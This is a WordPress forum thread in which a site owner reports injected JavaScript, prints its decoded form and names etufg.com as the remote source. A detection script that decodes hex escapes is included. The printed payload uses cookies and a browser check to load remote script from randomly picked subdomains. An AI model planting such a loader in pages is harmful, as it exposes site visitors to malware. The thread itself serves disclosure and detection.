Javascript Injection Report – based in etufg.com

  • I have just discovered an incident of Javascript Injection on my WordPress-based website. I am running the latest version of WP, and all associated plugins.

    The raw code is inserted just after the opening body tag.

    The raw code is:

    [hack code moderated]

    This can be decoded to:

    <ads><script type="text/javascript">document.write( <script>var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('<script type="text/javascript" src="http://'+g[h]+'.\x65\x74\x75\x66\x67\x2e\x63\x6f\x6d/tools/js.js"><\/script>')};</script> );</script></ads>

    The URL at the end, which seems to be the co-ordinating centre for the attack, is in hex and translates to:

    etufg.com

    So, this code seems to be randomly picking one of the following subdomains within that domain:

    • keg.etufg.com
    • kei.etufg.com
    • ken.etufg.com
    • kep.etufg.com
    • kev.etufg.com
    • kex.etufg.com
    • key.etufg.com
    • khi.etufg.com
    • kid.etufg.com
    • kif.etufg.com

    I would not be surprised if further subdomains and/or domains are involved, but this is just the result of my first 40 minutes of investigations.
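
A static check for the pattern reported above, as an added example that is not part of the original post: it decodes runs of `\xNN`/`\uNNNN` escapes inside `<script>` blocks as text, without executing anything, and notes whether the block sits directly after the opening body tag. The sample page, the `example.com` host and the function names are constructed for illustration.

```javascript
// Decode \xNN and \uNNNN escapes as plain text; nothing is evaluated.
function decodeJsEscapes(src) {
  return src.replace(/\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})/g,
    (_, x, u) => String.fromCharCode(parseInt(x || u, 16)));
}

// Report each <script> block that hides text behind four or more escapes.
function scanHtml(html) {
  const findings = [];
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  const runRe = /(?:\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}){4,}/g;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const runs = m[1].match(runRe) || [];
    if (runs.length === 0) continue;
    findings.push({
      offset: m.index,
      // The report above found the code right after the opening body tag.
      afterBody: /<body\b[^>]*>\s*$/i.test(html.slice(0, m.index)),
      writesMarkup: /document\.write\s*\(/.test(m[1]),
      hidden: runs.map(decodeJsEscapes),
    });
  }
  return findings;
}

// Constructed sample page: one injected block (hex-escaped example.com) and one benign script.
const SAMPLE = String.raw`<html><body><script type="text/javascript">var g=["aa","bb"],h=Math.floor(Math.random()*g.length);document.write('<script src="http://'+g[h]+'.\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f\x6d/tools/js.js"><\/script>');</script>
<p>Hello</p><script>var greeting = "plain text";</script></body></html>`;

console.log(JSON.stringify(scanHtml(SAMPLE), null, 2));
```

Run over saved copies of rendered pages or theme files; each decoded string in `hidden` is something to search for in proxy and web server logs.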

  • Thread Starter Luke Stevenson

    (@lucanos)

    Thanks Samuel, I was more posting it here as it seems to be code which either has not been seen before, or has not been written up like this before (I Googled for segments of the code above, but found no matches).

    Just trying to save someone else a bit of time, effort, and hair should more people be affected.

    post it at pastebin.com and bring the link back here

    Thread Starter Luke Stevenson

    (@lucanos)

    Pastebin of Hack Code

    Not that I can see the point of putting the code on Pastebin, where it might be found through Googling, but with no links back to this Forum post – creating a dead-end for anyone investigating their problem. But, as you are the Mod, I will defer to your judgement.

    the problem putting it here is everyone’s virus alert will start going off and I really don’t want to deal with all the “omg, the forum’s hacked” threads and emails
    :>)

    Thread Starter Luke Stevenson

    (@lucanos)

    But the code had been rendered into HTML and would not execute – so it should not have set off any kind of alerts.

    Any content I share here as a Post is parsed to make it readable – i.e. “<” changes to “& lt;” (space added to prevent parser from doing the same here), etc., which means that, from the view of the browser, it is content rather than structure and will be displayed, but not executed.

    I don’t understand your point.
